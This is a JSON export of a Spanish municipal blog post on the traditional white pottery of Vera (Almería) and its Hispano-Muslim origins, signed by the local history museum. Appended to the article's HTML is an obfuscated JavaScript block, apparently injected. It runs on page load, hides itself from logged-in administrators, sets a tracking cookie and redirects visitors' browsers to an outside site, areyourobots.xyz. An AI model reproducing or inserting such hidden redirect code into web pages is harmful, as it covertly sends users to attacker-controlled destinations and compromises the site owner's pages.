{"id":1098,"date":"2016-08-05T09:32:16","date_gmt":"2016-08-05T09:32:16","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=1098"},"modified":"2018-01-15T11:38:48","modified_gmt":"2018-01-15T11:38:48","slug":"la-ceramica-popular-de-vera-como-elemento-de-tradicion-desde-epoca-hispanomusulmana","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2016\/08\/05\/la-ceramica-popular-de-vera-como-elemento-de-tradicion-desde-epoca-hispanomusulmana\/","title":{"rendered":"LA CER\u00c1MICA  POPULAR DE VERA COMO ELEMENTO DE TRADICI\u00d3N DESDE \u00c9POCA HISPANOMUSULMANA"},"content":{"rendered":"<p>El origen propiamente dicho de la cer\u00e1mica en general est\u00e1 en la prehistoria, cuando se desconoc\u00eda el torno y se hac\u00eda a mano o bien sobre soporte de tejidos vegetales o madera y simplemente se secaba al sol, llegando poco a poco al conocimiento de su cocci\u00f3n en el fuego de hogueras y despu\u00e9s en hornos rudimentarios; naturalmente eran porosos y deleznables; despu\u00e9s se sometieron a la cocci\u00f3n del fuego controlado para endurecerlos y finalmente se impermeabilizaban cubriendo con una capa de \u201cengobe\u201d o \u201cbarniz\u201d. Y ya en \u00e9poca tardo romana e hispano-musulmana con vidriado con la que llegar\u00eda al esplendor de las t\u00e9cnicas. Esta cer\u00e1mica vidriada y policromada fue introducida desde el siglo X por los musulmanes de Oriente y hubo importantes manufacturadas en Almer\u00eda y provincia, principalmente en Pechina (Bayyana), Nijar y otros pueblos como Sorbas, Albox\u2026<\/p>\n<p><!--more--><\/p>\n<p>En Vera, se han estado fabricando objetos de barro de pervivencias y tradici\u00f3n artesanal de m\u00e1s de 7 generaciones conocidas. Estos productos comprend\u00edan desde ladrillos y otros materiales de construcci\u00f3n, art\u00edculos de alfarer\u00eda\/ como macetas, cantaros, botijos, ollas, tazas, jarras, jarrones, orzas, recubiertos con cord\u00f3n en relieve, hasta conos de desag\u00fce para los \u201c<em>terrados<\/em><strong>\u201d<\/strong>.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10325357_10202434396960757_530290466834922656_n.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2234\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10325357_10202434396960757_530290466834922656_n.jpg\" alt=\"10325357_10202434396960757_530290466834922656_n\" width=\"96\" height=\"128\" \/><\/a><\/p>\n<p>Seg\u00fan la tecnolog\u00eda alfarera popular para la cer\u00e1mica cocida, los materiales de tierras se pulverizan o se muelen con molino de piedra, mezcl\u00e1ndose con agua para formar una pasta que se comprime manualmente o con los pies y se moldea para darle la forma deseada en el torno, despu\u00e9s de los cual se cuece en el horno a elevadas temperaturas. La cer\u00e1mica de barro blanco sin decoraci\u00f3n es la m\u00e1s com\u00fan y caracter\u00edstica\/ en estos alfares.<\/p>\n<table style=\"height: 40px\" width=\"430\">\n<tbody>\n<tr>\n<td width=\"479\"><\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Los antecedentes de esta cer\u00e1mica est\u00e1n en la \u00e9poca hispanomusulmana de la comarca, que va desde el siglo IX al XVI, que por pervivencia de la tradici\u00f3n alfarera se han ido manteniendo las mismas tipolog\u00edas, con ligeras variantes, hasta hoy. Ya durante el siglo XVII se observa una tipolog\u00eda similar en los bodegones del pintor Zurbar\u00e1n donde ofrece en el Bodeg\u00f3n la m\u00e1s absoluta sencillez y la veracidad m\u00e1s asombrosa de lo que eran estas formas populares de la vajilla dom\u00e9stica. La organizaci\u00f3n y disposici\u00f3n de los \u201ccacharros\u201d representados no puede ser m\u00e1s simple. Una copa de bronce sobre una bandeja plateada, una vasija de barro blanco y una de barro rojo, y una cantarilla tambi\u00e9n blanca sobre bandeja de plata, se ofrecen sencillamente alineadas sobre una tabla. Y nos produce la sensaci\u00f3n real -porque reales adem\u00e1s son las formas populares de la \u00e9poca y las calidades de los materiales representados- de un mundo de orden, serenidad y limpieza.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-4-picos.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-2240\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-4-picos-225x300.jpg\" alt=\"jarra de 4 picos\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-4-picos-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-4-picos.jpg 720w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p>Es interesante la variada cer\u00e1mica de la alfarer\u00eda veratense, las piezas cer\u00e1micas son \u00fanicas, no repiti\u00e9ndose en ning\u00fan otro lugar, realizadas seg\u00fan la m\u00e1s pura tradici\u00f3n artesana, respet\u00e1ndose toda la variante de formas, barro, t\u00e9cnicas y cocci\u00f3n, de las originales encontradas en las cercanas ruinas hispanomusulmanas de la ciudad de Bayra, en el cerro del Esp\u00edritu Santo, pr\u00f3ximas al barrio alfarero de Las Cantarer\u00edas\/ en los arrabales del pueblo, obteni\u00e9ndose dichas tipolog\u00edas y barro seg\u00fan las t\u00e9cnicas ancestrales aprendida por tradici\u00f3n como la mezcla de dos tipos de tierras, recogidas en la misma zona, para conseguir el caracter\u00edstico aspecto blanquecino y poroso de la pasta y refrescante para contener agua y vinos.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-trampa.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2241\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-trampa-225x300.jpg\" alt=\"jarra de trampa\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-trampa-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-de-trampa.jpg 720w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p>En la antigua Vera, ya desde hace 500 a\u00f1os se escogi\u00f3 el continuar con las formas caracter\u00edsticas de las cer\u00e1micas de sus antecedentes moriscos, como elementos id\u00f3neos para utilizar en la vida diaria.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-detrampa.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2242\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-detrampa.jpg\" alt=\"jarra detrampa\" width=\"96\" height=\"128\" \/><\/a><\/p>\n<p>Los predecesores, con el artesanado morisco que qued\u00f3, se inclinaron siempre por estas formas. La afici\u00f3n a este tipo de cer\u00e1mica de sus antecesores moriscos, como elementos id\u00f3neos para utilizar en la vida diaria,\u00a0dio origen a la peculiar artesan\u00eda alfarera, pervivencia de aquella otra utilizada por los hispanomusulmanes de la antigua Vera (<strong><em>Bayra)<\/em><\/strong>.<\/p>\n<p>Cada alfarero y cada pieza salida de sus manos, recib\u00eda la imagen de su visi\u00f3n de las antiguas, de sus antepasados, representando su \u201cidea\u201d, su interpretaci\u00f3n de la manera de repetir la de sus antepasados, y dicha imagen se recoge meticulosamente sobre la cer\u00e1mica de tradici\u00f3n procurando salvar toda la riqueza de detalles y matices de aquellas antiguas originales, exceptuando la decoraci\u00f3n pintada de tema isl\u00e1mico que se pierde por razones obvias de la nueva cultura cristiana implantada. Esta representaci\u00f3n es un universo personal en cada individuo, plasmado a mano por esos artesanos y la propia introducci\u00f3n en los hornos artesanales llamados \u201cmorunos\u201d a la elevada temperatura de 700\u00ba con objeto de garantizar la porosidad del barro y su endurecimiento, para su resistencia a la humedad, y a la acci\u00f3n de los manejos de cocina, a los que iban expresamente dedicados.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/botijo-bartolo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2239\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/botijo-bartolo.jpg\" alt=\"botijo bartolo\" width=\"96\" height=\"128\" \/><\/a><\/p>\n<p>La conjunci\u00f3n de toda la serie de tipolog\u00edas le da un ingenuo encanto persona uno a cada cer\u00e1mica producida por distinto alfarero, con el valor artesanal y exquisito de que una sola pieza es irrepetible trabajo artesanal individual.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10457899_10202434395680725_964442499513200672_n.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2238\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10457899_10202434395680725_964442499513200672_n.jpg\" alt=\"10457899_10202434395680725_964442499513200672_n\" width=\"96\" height=\"128\" \/><\/a><\/p>\n<p>Esta serie de bellos ejemplares de la alfarer\u00eda veratense est\u00e1 siendo muy cotizada, ya que encaja perfectamente en el conjunto de una decoraci\u00f3n y un mobiliario modernos, tanto como en un ambiente rigurosamente de cocina.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10372791_10202434395520721_9160645337085776973_n.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2236\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10372791_10202434395520721_9160645337085776973_n.jpg\" alt=\"10372791_10202434395520721_9160645337085776973_n\" width=\"96\" height=\"128\" \/><\/a><\/p>\n<p>Esta tipolog\u00eda cer\u00e1mica tradicional se ha venido utilizando diariamente en la mesa popular como parte del ajuar dom\u00e9stico, siendo parte del \u201c<strong><em>regalo de novia<\/em><\/strong>\u201d<a href=\"#_ftn1\" name=\"_ftnref1\">[1]<\/a> para convertirse actualmente en valor ornamental. El barro veratense, sin decoraci\u00f3n, es de una estirpe hispano-musulm\u00e1n. El caso de la familia Hern\u00e1ndez es un vivo ejemplo de continuidad en el trabajo de barro desde tiempo inmemorial. Aunque realizaban todo tipo de piezas, lo m\u00e1s interesante en su producci\u00f3n de cer\u00e1mica blanca, ajust\u00e1ndose a la cer\u00e1mica tradicional de Vera, reproduciendo objetos que hasta hace poco han sido de uso diario, y a\u00fan otros cuyos dise\u00f1os se han ido obteniendo a lo largo de las necesidades de uso.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarrero.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2243\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarrero-200x300.jpg\" alt=\"jarrero\" width=\"200\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarrero-200x300.jpg 200w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarrero.jpg 641w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/><\/a><\/p>\n<p>Los temas de formas son los que popularmente se destinaban -y a\u00fan hoy se conservan- a las casas y al campo: c\u00e1ntaros, botijos, jarras, orzas etc., exclusivamente para recipientes de agua, cuyo barro tiene el secreto y la propiedad de refrescar el preciado l\u00edquido.<\/p>\n<p>En la propia ciudad hubo otros obradores en donde tambi\u00e9n se hac\u00eda cer\u00e1mica creativa y alfarer\u00eda tradicional en menor producci\u00f3n.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10370346_10202434393880680_5724592551942587711_n.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2235\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/10370346_10202434393880680_5724592551942587711_n.jpg\" alt=\"10370346_10202434393880680_5724592551942587711_n\" width=\"96\" height=\"128\" \/><\/a><\/p>\n<p>Anta\u00f1o, cada alfarero se especializaba en lebrillos, orzas, c\u00e1ntaros. Otros en alfarer\u00eda sin vidriar como macetas, floreros; otros para vasijas que se dedicaban sobre todo para el fuego: ollas, pucheros, cazuelas, etc.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-detrampa.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2242\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/08\/jarra-detrampa.jpg\" alt=\"jarra detrampa\" width=\"96\" height=\"128\" \/><\/a><\/p>\n<p>El proyecto inicial de recuperaci\u00f3n de t\u00e9cnicas y formas antiguas puede llevar a la aceptaci\u00f3n comercial del \u201cTurismo\u201d que hasta aqu\u00ed llega, y como consecuencia inmediata a la apertura de un mercado a nivel europeo. Tambi\u00e9n es proyecto a largo plazo llevar a la reapertura de la Escuela de Alfarer\u00eda -as\u00ed como otras artesan\u00edas-, pudiendo efectuarse cualquier tipo de pr\u00e1cticas y elaboraci\u00f3n, a trav\u00e9s de los encargos, adem\u00e1s de vender en la propia Escuela los trabajos de los alumnos, personas interesadas en mantener viva su artesan\u00eda y para que pueda convertirse en una fuente de ingresos de gran importancia para ellos y para la tradici\u00f3n artesana veratense.<\/p>\n<p><a href=\"#_ftnref1\" name=\"_ftn1\">[1]<\/a> En la tradici\u00f3n alfarera de Lorca esta tipolog\u00eda cer\u00e1mica es propia tambi\u00e9n del ajuar dom\u00e9stico, denomin\u00e1ndose \u201cjarra de novia\u201d.<\/p>\n<p style=\"text-align: right\">Domingo Ortiz Soler<\/p>\n<p style=\"text-align: right\">Museo Hist\u00f3rico Municipal<\/p>\n<p style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/03\/Domingo-Ortiz-2012.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1993\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/03\/Domingo-Ortiz-2012.jpg\" alt=\"Domingo Ortiz 2012\" width=\"160\" height=\"264\" \/><\/a><\/p>\n<p style=\"text-align: right\">\u00a0Fotograf\u00edas: Helios<\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El origen propiamente dicho de la cer\u00e1mica en general est\u00e1 en la prehistoria, cuando se desconoc\u00eda el torno y se hac\u00eda a mano o bien sobre soporte de tejidos vegetales o madera y simplemente se secaba al sol, llegando poco a poco al conocimiento de su cocci\u00f3n en el fuego de hogueras y despu\u00e9s en &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2016\/08\/05\/la-ceramica-popular-de-vera-como-elemento-de-tradicion-desde-epoca-hispanomusulmana\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">LA CER\u00c1MICA  POPULAR DE VERA COMO ELEMENTO DE TRADICI\u00d3N DESDE \u00c9POCA HISPANOMUSULMANA<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":1099,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[61,275],"class_list":["post-1098","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-museo","tag-arte-artesania","tag-s-xv"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=1098"}],"version-history":[{"count":3,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1098\/revisions"}],"predecessor-version":[{"id":2244,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1098\/revisions\/2244"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/1099"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=1098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=1098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=1098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}